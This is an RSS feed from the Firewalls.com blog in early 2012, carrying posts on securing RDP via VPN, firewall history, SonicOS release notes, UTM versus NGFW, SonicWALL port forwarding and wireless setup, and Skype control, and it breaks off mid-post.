<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title><![CDATA[Firewalls.com Blog]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
    <link>http://www.firewalls.com/blog/</link>
    <description><![CDATA[Firewalls.com Blog]]></description>
    <pubDate>Sat, 04 Feb 2012 04:30:54 +0000</pubDate>
    <image>
      <url>http://static.firewalls.com/skin/frontend/default/firewalls/images/logo.png</url>
      <title><![CDATA[Firewalls.com Blog]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/</link>
    </image>
    <generator>Zend_Feed</generator>
    <docs>http://blogs.law.harvard.edu/tech/rss</docs>
    <item>
      <title><![CDATA[Securing RDP with VPN]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/secure_rdp_with_vpn/</link>
      <description><![CDATA[<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/rdp.png" alt="Microsoft Remote Desktop services (RDP)" /></td>
    <td><p>Microsoft Remote  Desktop services (RDP) are very often used to:</p>
      <ul>
        <li>Remotely manage a Windows-based machine like a  Windows server.</li>
        <li>Gain access to some resources on a Windows-based  computer.</li>
    </ul></td>
  </tr>
</table>

<h3>Using RDP over Internet</h3>
<p> A very tempting way of using RDP is to expose the RDP server to the Internet by  &ldquo;opening&rdquo; the needed port on the edge firewall; typically the server listens on  TCP port 3389. Then the remote user uses his RCP client to connect to this  server.</p>
<p  align="center"> <img src="http://static.firewalls.com/media/wysiwyg/firewalls/open_port.png" alt="Using RDP over Internet" /></p>
<h3>Why not expose directly to the Internet the RDP server</h3>
<p> There are a couple of problems with directly exposing the RDP server to the  Internet:</p>
<ul  style="list-style-type:disc; margin-left:30px">
  <li>Your RDP server can become a target for  automated brute-force attacks. For example the Morto worm targeted RDP a while  ago and huge spikes in RDP TCP port 3389 scans were reported by the SANS Storm  Center at that time. The worm used a list of passwords for the default administrator  user name in an attempt to gain access to the system over RDP.</li>
  <li>Attackers specifically search for open RDP ports  and attempt to log into the RDP server by guessing the username and password. Publicly  available tools like ncrack, tsgrinder or RDP Brute Force make easy such  attacks.</li>
  <li>You may forget that RDP was allowed from the  Internet to an internal machine and an RDP vulnerability to appear; in the most  fortunate scenario attackers may &ldquo;only&rdquo; manage to DoS the exposed server.</li>
  <li>Normally in the default configuration the RDP  connection is vulnerable to MITM attacks as it only provides encryption but  does not authenticate the server. While you can mitigate these using TLS or Network  Level Authentication (NLA), you need to configure appropriately both the servers  and clients; specifically <strong>all</strong> your  RDP servers and clients.</li>
  <li>Not only the server is exposed, the client can  be too; speaking about MITM attacks, in the context of the MS09-044 RDP  vulnerability, a hacker could execute code on the client&rsquo;s machine.</li>
</ul>
<p  align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/open_port_exposed.png" alt="problems with directly exposing the RDP server to the Internet:" /></p>
<h3>Why access the RDP server over VPN</h3>
<p> Accessing the RDP server over VPN provides certain advantages:</p>
<ul style="list-style-type:disc; margin-left:30px">
  <li>The VPN server authenticates and authorizes the  users to use RDP; first a user must successfully authenticates himself with the  VPN server (strong authentication it&rsquo;s easy to implement these days), then the  VPN server will allow only permitted users to access the administrator  specified RDP servers.  And the attempted  access will be logged on the VPN server.</li>
  <li>Mitigates MITM attacks and prevents unauthorized  access to the RDP server.</li>
  <li>At no time attackers have direct access to the  RDP server/client.</li>
  <li>A SSL VPN server it&rsquo;s easy to setup. Users can  use the browser for clientless SSL VPN access or a full blown SSL VPN client if  needed. SSL VPN can be used from many remote locations where outbound traffic  is restricted and also allows the secure access to other internal resources.</li>
</ul>
<p align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/rdp_vpn.png" alt="advantages of Accessing the RDP server over VPN " /></p>
<h3>Conclusion</h3>
<p> Using RDP without VPN exposes both RDP servers and clients to  various attacks. SSL VPN can represent a simple and convenient way of securing  RDP.</p>
]]></description>
      <pubDate>Fri, 03 Feb 2012 13:12:16 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[History and Evolution of Firewalls – Part 1]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/history_and_evaluation_of_firewalls_1/</link>
      <description><![CDATA[<h3>Philosophy of designing and architecting security at the  gateway level</h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/firewalls_history.jpg" alt="" /></td>
    <td><p>The history of firewalls dates back to the late 1980s. Their evolution was not  necessarily dictated by technological revolutions, rather was imposed by the  philosophy of designing and architecting security at the gateway level; it went  down to the market demand.</p>
    <p> Technology offering strong security was present from the  early years but did not catch. Instead a model offering lesser security but  better usability and performance emerged as a dominant force in the firewall  market. This has slowly evolved surrounded by niche players.</p></td>
  </tr>
</table><div align="center">
<img src="http://static.firewalls.com/media/wysiwyg/firewalls/philosophy.png" alt="Philosophy behnd firewalls.com" /></div>
<h3>Timeline of firewalls evolution</h3>
<p> We can view in the below timeline major events that occurred in the history of  firewalls:<br>
 <div align="center">
<img src="http://static.firewalls.com/media/wysiwyg/firewalls/timeline.png" alt="time line for firewalls articles" /></div> <br>
  Quickly explaining what happened:</p>
<div width="707px"; style="background-color:#CCC" ><strong> 1987-1994 Time Frame</strong></div>
<ul style="list-style-type:disc; margin-left:30px">
  <li>The first firewalls were routers with filtering  rules in the late 1980s.</li>
  <li>Between 1989 and 1994 there is a little boom in  firewall research and the firewall market appears along with the first  commercial firewalls.</li>
  <li>The static packet filter represents a first  generation of firewalls; Jeff Mogul&rsquo;s screend was an example in 1989.</li>
  <li>Steve Bellovin and Bill Cheswick from AT&amp;T  Bell Labs came with a circuit relay firewall in 1991, probably the first form  of stateful packet inspection firewall. Stateful packet filters firewalls are called  by some second generation firewalls.</li>
  <li>Marcus Ranum invents the application proxies and  DEC SEAL, the first commercial firewall, appears in 1991 using them. At this  stage, we can speak about the third generation of firewalls, application  gateways or proxy firewalls. Furthermore, with DEC SEAL we already have a hybrid  firewall, as a combination of application proxies and packet filters is used.</li>
  <li>In 1994, Check Point debuts Firewall-1, a  stateful inspection firewall with a GUI; basically it&rsquo;s a stateful packet  inspection firewall with some application layer intelligence. It&rsquo;s an  alternative to the proxy firewalls. It has the advantage of being fast due to the  light inspection, easy to use and can control all network traffic as it does not  need a proxy for each application. Stateful inspection firewalls can be called  fourth generation firewalls.</li>
</ul>
<div width="707px"; style="background-color:#CCC"><strong>1995-2004 Time Frame</strong></div>
<ul style="list-style-type:disc; margin-left:30px">
  <li>In addition to filtering, firewalls start to  incorporate more features like VPN, first called firewall-to-firewall  encryption and introduced by the ANS Interlock firewall. Other features like  QoS, URL screening or antivirus scanning are added too.</li>
  <li>Main firewalls are hybrid firewalls,  incorporating both stateful inspection and proxies. The stateful inspection  dominates and other vendors follow the trend initiated by Check Point. Proxy firewalls  are niche players.</li>
  <li>In the late 1990s, specialized application  firewalls protecting applications appeared also as niche players; the early  WAFs.</li>
  <li>With the incorporation of new features we began  the transition to UTMs and DPI; the UTM term was coined in 2004 by IDC. They  are the result of more security and control being needed for cleaning the  traffic from threats. In 2003 we see many vendors launching &ldquo;all-in-one&rdquo;  security products.</li>
  <li>Also in 2003, Gartner starts speaking about Next  Generation Firewalls.</li>
  <li>UTMs may control web traffic per users with the  help of a web proxy.</li>
  <li>In parallel with the firewall evolution: in 1996  Squid proxy appears; in 1998 Snort IDS is created; in 1999 the first commercial  IPS Network ICE's BlackICE IPS debuts. Squid and Snort will be integrated into many  UTMs over the time.</li>
</ul>
<div width="707px"; style="background-color:#CCC"><strong>2005-2012 Time Frame</strong></div>
<ul style="list-style-type:disc; margin-left:30px">
  <li>After 2004 the UTM market and UTM products  evolve. UTMs are plagued by performance issues and the limitation of the level  of inspection into the application layer. More and more the term DPI is used.</li>
  <li>In 2006, WAFs are defined with the help of the Web  Application Security Consortium. As time goes by, they will become a stronger  presence on the market.</li>
  <li>In 2008 Palo Alto Networks claim they have a  Next Generation Firewall; this solves UTM&rsquo;s performance issues and provides  greater control and visibility into network traffic shifting the game into  managing(identify, block, allow, monitor and shape) applications and their  features per users.</li>
  <li>In 2009 Gartner defines the Next Generation  Firewall.</li>
  <li>Today, 2012; the market for Next Generation  Firewall is on the rise with a couple of vendors offering such gear; to name a  few: Palo Alto Networks, SonicWALL or Fortinet. The specialized application  firewalls market is also stronger, with many WAFs and Database Firewall  vendors.</li>
</ul>
]]></description>
      <pubDate>Thu, 02 Feb 2012 18:16:48 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicOS Version 5.8.1.5 Now Available]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicos-5-8-1-5/</link>
      <description><![CDATA[<img src="http://static.firewalls.com/media/wysiwyg/firewalls/5-8-1-5.png" alt="sonicos 5.8.1.5 released" align="left" style="margin-right:10px" />The SonicOS 5.8.1.5 is released. It resolved many issues, like: Domain limitation for Content Filtering System, Newly added Common Name Exclusions in DPI-SSL, duplicate policies and extra characters in NAT Policy of Networking, fixed for user level Authentication and many more.
<h2>Affected SonicWALL Firewalls</h2>
<p>The SonicOS 5.8.1.5 release is supported on the following SonicWALL Deep Packet Inspection (DPI) security appliances:</p>
<table width="100%" class="data-table" id="product-attribute-specs-table"><thead>
  <tr>
    <th width="33%">SonicWALL E-Class NSA Series</th>
    <th width="33%">SonicWALL NSA Series</th>
    <th width="33%">SonicWALL TZ Series</th>
  </tr></thead><tbody>
  <tr>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-e-class-series/sonicwall-e-class-nsa-8500">SonicWALL NSA E8500</a></td>
    <td>SonicWALL NSA 5000</td>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-tz-firewalls/sonicwall-tz-210">SonicWALL TZ 210 / 210 Wireless</a></td>
  </tr>
  <tr>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-e-class-series/sonicwall-e-class-nsa-e7500">SonicWALL NSA E7500</a></td>
    <td><a href="hhttp://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-4500">SonicWALL NSA 4500</a></td>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-tz-firewalls/sonicwall-tz-200">SonicWALL TZ 200 / 200 Wireless</a></td>
  </tr>
  <tr>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-e-class-series/sonicwall-e-class-nsa-e6500">SonicWALL NSA E6500</a></td>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-3500">SonicWALL NSA 3500</a></td>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-tz-firewalls/sonicwall-tz-100">SonicWALL TZ 100 / 100 Wireless</a></td>
  </tr>
  <tr>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-e-class-series/sonicwall-e-class-nsa-e5500">SonicWALL NSA E5500</a></td>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-2400">SonicWALL NSA 2400</a></td>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td><a href="http://www.firewalls.com/SonicWALL/sonicwall-firewall/sonicwall-nsa-series/sonicwall-nsa-240">SonicWALL NSA 240</a></td>
    <td>&nbsp;</td>
  </tr></tbody>
</table>
<h2><strong>Resolved Issues<u></u><u></u></strong> in SonicOS 5.8.1.5</h2>
<h3>Content Filtering System</h3>
<table class="data-table" id="product-attribute-specs-table"><thead>
  <tr>
   <th width="33%">Symptom</th>
    <th>Condition / Workaround</th>
    <th width="7%">Issue</th>
  </tr></thead><tbody>
  <tr>
    <td>Only the first 100 domains are filtered by the Content Filtering System (CFS), even though the Allowed List is set to 100+ domains</td>
    <td>Occurs when creating a custom CFS policy, setting the allowed domains to &quot;Per Policy&quot;, and adding 100+ domains to the Allow List. Resolution: The user is now warned when 100 domains are exceeded, and a note has been added in the management interface to inform the user that the domain limit is 100.</td>
    <td>107969</td>
  </tr></tbody>
</table>
<h3>DPI-SSL
</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead>
    <tr>
      <th width="33%">Symptom</th>
      <th>Condition / Workaround</th>
      <th width="7%">Issue</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Newly added Common Name Exclusions are not populated in the DPI-SSL Common Name Exclusions list, or existing exclusions are lost.</td>
      <td>Occurs when adding or editing URLs in the DPI-SSL Common Name Exclusions list.</td>
      <td>98536</td>
    </tr>
  </tbody>
</table>
<h3>Networking</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead>
    <tr>
      <th width="33%">Symptom</th>
      <th>Condition / Workaround</th>
      <th width="7%">Issue</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>The Network &gt; NAT Policies page in the management interface can display duplicate policies and extra characters on some policy names.</td>
      <td>Occurs when enabling the Web Proxy feature with an IP on the WAN, then restarting the appliance.</td>
      <td>110091</td>
    </tr>
  </tbody>
</table>

<h3>Users</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead>
    <tr>
      <th width="33%">Symptom</th>
      <th>Condition / Workaround</th>
      <th width="7%">Issue</th>
    </tr>
    <tr>
      <td>The redirect for forced authorization by SonicWALL does not work with Internet Explorer 8 or 9</td>
      <td>Occurs when using a User Level Authentication (ULA) rule to force authorization by SonicWALL on an interface in Layer 2 Bridge Mode.</td>
      <td>109762</td>
    </tr>
  </thead>
  <tbody>
  </tbody>
</table>
<h3>Visualization</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead>
    <tr>
      <th width="33%">Symptom</th>
      <th>Condition / Workaround</th>
      <th width="7%">Issue</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>The NetFlow EndTime timestamp results in 0.00000 for valid and allowed TCP packets.</td>
      <td>Occurs when the NetFlow collector's logging is enabled on Applicable Interfaces and Rules, and TCP traffic is sent to the allowed destination. Upon checking the packet capture details, the EndTime timestamp displays as 0.00000.</td>
      <td>107239</td>
    </tr>
  </tbody>
</table>
<h3>WAN Acceleration</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead>
    <tr>
      <th width="33%">Symptom</th>
      <th>Condition / Workaround</th>
      <th width="7%">Issue</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>WFS Acceleration cannot be enabled and the error message &quot;An error has occurred saving the hostname&quot; displays.</td>
      <td>Occurs when disabling WFS Acceleration, upgrading or downgrading the WXA firmware version, then re-enabling WFS Acceleration. WXA hostnames were allowed to be edited after WFS Acceleration was disabled, causing the error message when trying to re-enable WFS Acceleration.</td>
      <td>110377</td>
    </tr>
  </tbody>
</table>
<h3>Wireless</h3>
<table class="data-table" id="product-attribute-specs-table">
  <thead>
    <tr>
      <th width="33%">Symptom</th>
      <th>Condition / Workaround</th>
      <th width="7%">Issue</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>The SonicPoint Ne becomes unresponsive during an Intrusion Detection Services (IDS) scan.</td>
      <td>Occurs when configuring a SonicPoint Ne to an interface on the WLAN zone, then performing a manual IDS scan. This may also occur on boot up, when the appliance performs an initial scan.</td>
      <td>111914</td>
    </tr>
  </tbody>
</table>
<h3>Donwload:  <a href="www.dttstores.com/downloads/232-000670-00_Rev_A_SonicOS_5.8.1.5_Release_Notes.pdf" target="_blank">SonicOS Version 5.8.1.5 Release Note</a></h3>
<h2><strong>Where to Download Updates<u></u><u></u></strong></h2>
<p>Log into your <a href="http://www.mysonicwall.com" target="_blank">www.mysonicwall.com</a> <u></u><u></u></p>
<p>Click on Downloads &gt; Download Center &gt; from the &ldquo;Software Type&rdquo; dropdown box select your firewall&rsquo;s firmware.<u></u><u></u></p>

]]></description>
      <pubDate>Tue, 31 Jan 2012 15:01:33 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[UTM Firewalls versus Next Generation Firewalls]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/utm_firewall_vs_ng_firewall/</link>
      <description><![CDATA[<h3>Introduction</h3>
<p> <img src="http://static.firewalls.com/media/wysiwyg/firewalls/buzz.png" align="left" style=" margin-right:10px" />A lot of buzz was made  by NGFWs(Next Generation Firewalls) and people wonder how a NGFW differs from  an UTM(Unified Threat Management Gateway).</p>
<p> They seem to share many similarities and this makes things  quite confusing.</p>
<p> One key aspect that differentiates the two is the  functionality delivered.</p>
<h3> Unified Threat Management Gateways (UTMs)</h3>
<p> The UTM term was coined by IDC.</p>
<p> UTMs appeared as a response to blended threats. A simple stateful inspection  firewall wasn&rsquo;t able to defend the network against the multitude of threats.</p>
<p> To deal with these threats, enterprises can chain a couple  of boxes like:</p>
<ul style="list-style-type:disc; margin-left:35px">
  <li>Regular stateful protocol inspection firewalls.</li>
  <li>Web proxies for URL/content filtering and  antivirus/malware scanning.</li>
  <li>Intrusion Prevention Systems(IPS) for monitoring  and blocking malicious activities.</li>
  <li>Spam filtering to filter spam emails.</li>
</ul>
<p> But this &ldquo;chaining&rdquo;  can introduce certain management issues, so a solution was to collocate all  these services on a single appliance called UTM.</p>
<div class="add-to-holder"> UTMs unify multiple systems under a single  appliance that it&rsquo;s easy to deploy and manage rather than administer them individually. </div>
<h3> Next Generation Firewalls (NGFWs)</h3>
<p> The term Next Generation Firewall term was coined by Gartner.</p>
<p> Gartner argue that the NGFW is the evolution of the  enterprise firewall market, while UTM is aimed at the SMB/branch market. Some  UTM vendors disagree and state that their gear is capable of serving  enterprises.</p>
<ul style="list-style-type:disc; margin-left:35px">
  <li>NGFW does not merely collocate security services  under a single appliance; it integrates them(e.g. the firewall is integrated  with the IPS, antivirus, etc.), the end result being a single-pass engine.</li>
  <li>NGFW delivers wire-speed network security. This  is possible due to the integration of the security services and the use of a  single engine.</li>
  <li>NGFW offers application control and great  real-time visibility into the network traffic. One fundamental capability of a  NGFW is to control applications and their features meaningless of port and  protocol while optimizing the traffic flow.</li>
  <li>NGFW can control the access to resources based  on users or group of users(e.g. integration with Active Directory for user-based  policies). This is possible for all network traffic, not just web traffic.</li>
</ul>
<div class="add-to-holder">NGFWs unify the security services into a single  engine and change the designing of access control and security policies. They extend  the management of applications and traffic flow beyond block/allow.</div>
<h3>UTM and NGFW face to face
</h3>
<p> Let&rsquo;s analyze the two and see how they compare.</p><thead>
<table width="100%"id="product-attribute-specs-table" class="data-table">
 <thead> <tr>
    <th width="319" valign="top" align="center" ><strong>UTM</strong></th>
    <th width="319" valign="top"><strong>NGFW</strong></th>
  </tr></thead><tbody>
  <tr >
    <td width="319" valign="top"><p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/utm.png" alt=" UTM firewall" align="left" style="margin-right:10px" />Multiple    security services are rather collocated than integrated; a separate engine is    used for every service.</p></td>
    <td width="319" valign="top"><p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/ngfw.png"  align="left" style="margin-right:10px" />Multiple    security services are integrated; a single engine is used for all services.</p></td>
  </tr>
  <tr class="odd">
    <td width="319" valign="top"><p>Performance can drastically drop when all security services are    enabled.</p></td>
    <td width="319" valign="top"><p>Due to the single-pass architecture, performance is maintained at an    acceptable level even when all security services are activated.</p></td>
  </tr>
  <tr >
    <td width="319" valign="top"><p>While capable of offering robust Deep Packet Inspection(DPI), this is    normally limited to avoid performance issues; e.g. scans small file sizes or    a small number of protocols.</p></td>
    <td width="319" valign="top"><p>Using the single-pass architecture, the NGFW scans files of all sizes    for viruses, malware and other threats over a wide range of protocols including    raw TCP traffic.</p></td>
  </tr>
  <tr class="odd">
    <td width="319" valign="top"><p>Capable of scanning encrypted traffic like SSL.</p></td>
    <td width="319" valign="top"><p>Capable of scanning encrypted traffic like SSL.</p></td>
  </tr>
  <tr>
    <td width="319" valign="top"><p>Rather controls access &ldquo;old school&rdquo; style: per port, protocol plus    URL/content filtering. Some form of application control can be achieved using    the combination of the web proxy and IPS.</p></td>
    <td width="319" valign="top"><p>In addition to the old school way of controlling access, a NGFW natively    controls access to applications and their features meaningless of port and    protocol. Includes a growing database of application signatures.</p></td>
  </tr>
  <tr class="odd">
    <td width="319" valign="top"><p>The main functions of an UTM are allow, block and log. Some form of    QoS or bandwidth control is present; only specific applications can be    optimized or limited.</p></td>
    <td width="319" valign="top"><p>The NGFW&rsquo;s functions include allow, block, log, monitor and bandwidth    control; the last one is also integrated to offer application bandwidth    management. </p></td>
  </tr>
  <tr>
    <td width="319" valign="top"><p>Partial real-time visibility into the network traffic; e.g. threats    detected, URLs accessed by users or protocol used on the network.</p></td>
    <td width="319" valign="top"><p>Great real-time visibility into the network traffic; the admin can    view/monitor what applications the users access and how much bandwidth they    consume along with the threats detected or protocols used from a single    console.</p></td>
  </tr>
  <tr class="odd">
    <td width="319" valign="top"><p>Controlling access per users is possible for web traffic with the    help of the web proxy.</p></td>
    <td width="319" valign="top"><p>Controlling access per users is possible for all network traffic.    Furthermore access to applications and their features is also controlled per    users.</p></td>
  </tr></tbody>
</table>
<h3>Conclusion</h3>
<p> <img src="http://static.firewalls.com/media/wysiwyg/firewalls/concl.png" align="left" style="margin-right:10px"  />As we saw, an UTM  can do many of the things a NGFW does. The UTM normally rather collocates  security services on a single appliance while the NGFW integrates them into a  single engine on a single appliance.</p>
<p> As a result, the NGFW takes to a different level the performance offered when  DPI is performed while offering great application control and visibility into the  network traffic.</p>]]></description>
      <pubDate>Mon, 30 Jan 2012 18:29:28 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL Port Forwarding How-To Video]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall_port_forwarding/</link>
      <description><![CDATA[<h2>What is Port Forwarding</h2>
<p>Port forwarding enables remote clients to access a specific service on a server located on the internal network behind the firewall. It is a form of NAT which allows you to forward a specific port to a specific host.</p>
<ul>
<li>The remote clients can be Internet users or remote employees.</li>
<li>The services accessed by these users can be HTTP, FTP or SMTP to name a few.</li>
</ul>
<h2>Why Do You Need Port Forwarding</h2>
<p>Port forwarding is used when you have a single public IP address or a limited number of IP addresses along with multiple internal servers that need to be accessible from the Internet. You cannot dedicate a public IP address to every internal server because you do not have so many IP addresses. Instead you forward a specific port to the needed internal server; the port forwarded is the port on which the service on the internal server listens to.</p>
<h2>How Port Forwarding Works</h2>
<p>Consider the case where you have a single public IP address on the WAN interface of the firewall and a couple of internal servers running different services. For example one server is a web server, other a FTP server and another one a SMTP mail server.</p>
<p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/port-forward-diagram.png" alt="" /></p>
<ul>
<li>The web server&rsquo;s case: TCP port 80 used by HTTP will be forwarded to the internal web server. The remote clients&rsquo; requests will be destined to the firewall&rsquo;s public IP address on port 80; the firewall will translate the destination IP address to the internal web server&rsquo;s private IP address and will forward the translated requests to this server.</li>
<li>Similar with the mail server; Assuming that SMTP is running on the mail server, the TCP port 25 used by SMTP will be forwarded to the internal mail server.</li>
<li>Almost the same with FTP and its TCP port 21. The difference is that FTP may use additional dynamic ports for data transfers, so the firewall will use a FTP NAT helper to sense which other ports need to be automatically forwarded to the server.</li></ul>
<h2>SonicWALL Port Forwarding How-To Video</h2>
Learn how to setup port forwarding using NAT policies on your SonicWALL firewall.  Included are (3) examples of how to forward HTTP, FTP and SMTP from a single WAN IP to several servers on the LAN.<BR>
<iframe width="720" height="366" src="http://www.youtube.com/embed/dyTF1syBxAA" frameborder="0" allowfullscreen></iframe>]]></description>
      <pubDate>Fri, 20 Jan 2012 16:54:52 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL Mobile Connect]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/mobile_connect/</link>
      <description><![CDATA[<h3>Employees owned mobile devices, public Wi-Fi hotspots and the need to  remotely access corporate resources</h3>
<p>Latest surveys indicate that employees use personally owned  mobile devices for work and this trend will increase in the future; the  enterprises need to urge in supporting these employee-owned mobile devices  because they can dramatically increase the work productivity allowing an  outstanding level of mobility.</p>
<p> Employees can use their own smartphones or tablets to  remotely access corporate resources from public Wi-Fi networks which provide  free or cheap Internet connections.</p><img src="http://static.firewalls.com/media/wysiwyg/firewalls/sec_access_own_dev.jpg" alt="" />
<p>There are a few challenges in providing these remote workers  with the level of access they need:</p>
<ul style="list-style-type:disc; margin-left:30px">
  <li>Due to the untrusted nature of the Wi-Fi  networks they use, strong encryption and authentication is needed for all the  connections they initiate back to the corporate network meaningless if the  original applications provide or not such security.</li>
  <li>They access many resources like email, file  shares, various simple or complex applications.</li>
  <li>SSL VPN portals are neat but only provide  limited access; remembr that for extended functionality they make use of  ActiveX controls or Java applets while the mobile browsers either do not run  them or offer limited support for them.</li>
  <li>Unified secure remote access: a single VPN  client that would offer the needed level of access would be great making sure  the traffic destined to the corporate network is protected especially when the  Internet connection is a wireless hotspot.</li>
  <li>The mobile devices being unmanaged endpoints can  be a door for malware/viruses to enter the corporate network; the traffic from  the mobile devices must be scanned and cleaned from such threats.</li>
</ul>
<h3>A unified VPN client to the rescue for accessing the  corporate resources</h3>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/sonicwall_mobile_connect.jpg" alt="" /></td>
    <td>SonicWALL  Mobile Connect is a  single VPN client, SSL-based, allows easy and secure remote access to needed resources for employees owned mobile devices capable of using wireless connections. Furthermore the same VPN client can be used inside the corporate network from a local WLAN to access the internal network without the need to provision an authenticated and encrypted wireless connection.</td>
  </tr>
</table>
<p> Such a client can be the SonicWALL Mobile Connect unified  client app for Apple iOS.</p>
<img src="http://static.firewalls.com/media/wysiwyg/firewalls/sec_access_own_dev_sonwll.jpg" alt="SonicWALL Mobile Connect " />
<ul style="list-style-type:disc; margin-left:30px">
  <li>It’s easy to obtain and install as it’s downloadable  from the App Store; users can install it on their own iPhone or iPad.</li>
  <li>It uses encrypted SSL VPN connections to ensure  confidentiality and data integrity; users’ traffic is protected while they  travel and access the corporate networks from public Wi-Fi hotspots.</li>
  <li>It has a VPN on Demand feature that encrypts  traffic whenever users attempt to access protected internal resources like an  application, web site or host.</li>
  <li>With the SonicWALL Next-Generation Firewall on  the corporate network, a Clean VPN solution can be achieved as the firewall scans  the mobile VPN clients’ traffic for viruses, malware, worms or spyware applying  IPS, Gateway antivirus and Antispyware inspection. Furthermore the SonicWall firewall’s  application control functionality can define how applications and bandwidth are  used.</li>
  <li>When they are back at the corporate office,  users can continue to use their own mobile devices to access the internal  network with the same Mobile Connect client from the local WLAN.</li>
</ul>

]]></description>
      <pubDate>Mon, 09 Jan 2012 06:30:12 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Maximizing Your SonicWALL Wireless Radio Channels]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall-wireless-channels/</link>
      <description><![CDATA[<p>As your wireless networking needs grow so does your deployment of wireless access radios.  This article will help provide you some insight into what your wireless network spectrum looks like and offers suggestions to help improve your overall wireless performance.</p>
<h3>Biggest Problem with Wireless Networks... Overlapping Wireless Radios</h3>
<p>For networks that deploy a single wireless access point on their network (e.g. SonicWALL wireless firewall or the SonicPoint access points) radio spectrum overlap is not an issues. &nbsp;But once you begin expanding your network with additional access points you can run into performance issues caused by channel overlap.</p>
<p>Channel overlap is caused when two or more wireless radios are assigned to and using the same wireless channels. &nbsp;This can cause network congestion, dropped packets and many other issues that slow down the wireless network.</p>
<h3>The Solution - Control Your Channels</h3>
<p>By default, all SonicWALL wireless devices are setup to automatically assign channels to the wireless radio. &nbsp;In an environment where there are multiple radios this method of deployment is no longer feasible. &nbsp;Instead, you must manually setup your radios properly to prevent the overlapping.</p>
<p>In the following video we will demonstrate to you have your can view your entire wireless LAN, identify your access points and see the channels that may be overlapping. &nbsp;In addition, you will learn how you can modify the radio on your SonicWALL wireless firewall and/or SonicPoints in order to maximize your wireless experience.</p>
<p>&nbsp;</p>
<iframe width="720" height="366" src="http://www.youtube.com/embed/R6S2BQSNT-I" frameborder="0" allowfullscreen></iframe>]]></description>
      <pubDate>Fri, 06 Jan 2012 15:09:33 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Controlling Skype access through the corporate firewall]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/control_skype/</link>
      <description><![CDATA[<h3>Skype on the corporate network</h3>
<p> Skype is a proprietary voice over IP service that allows users to make voice  calls over the Internet. Skype users can call each other free-of-charge; calling  mobile phones or landlines costs a fee.</p>
<h3> Skype can be useful for both home users and enterprises.</h3>
<p> A quite common situation that appears for an organization is  the need to allow the use of Skype for some users(for work related activities) while  blocking the use of it for the rest of the users.</p>

<div align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/need.png" alt="" /></div>
<p>  Skype is a peer-to-peer system rather than a client-server  system which makes the blocking of it a little bit of a problem; in many cases  network administrators manage to block Skype with their firewalls but they do  not have enough flexibility to allow the use of it for some users. The block  it&rsquo;s either on or off for all users.</p>
<h3> Why block Skype</h3>
<ul style="list-style-type:disc; margin-left:30px">
  <li>Opens a door for viruses and malware to enter  your network without being stopped at the gateway level; Skype&rsquo;s traffic is  encrypted with a proprietary protocol and thus not inspected by the firewall.</li>
  <li>Users can abuse the use of it affecting the  Internet bandwidth consumption(especially with file transfers) and these users  may end up having low work productivity spending their time chatting with their  friends.</li>
</ul>
<h3>Why allow Skype</h3>
<ul style="list-style-type:disc; margin-left:30px">
  <li>Represents a cost effective and high quality IP  telephony solution; you do not to need to roll out your own VoIP  infrastructure.</li>
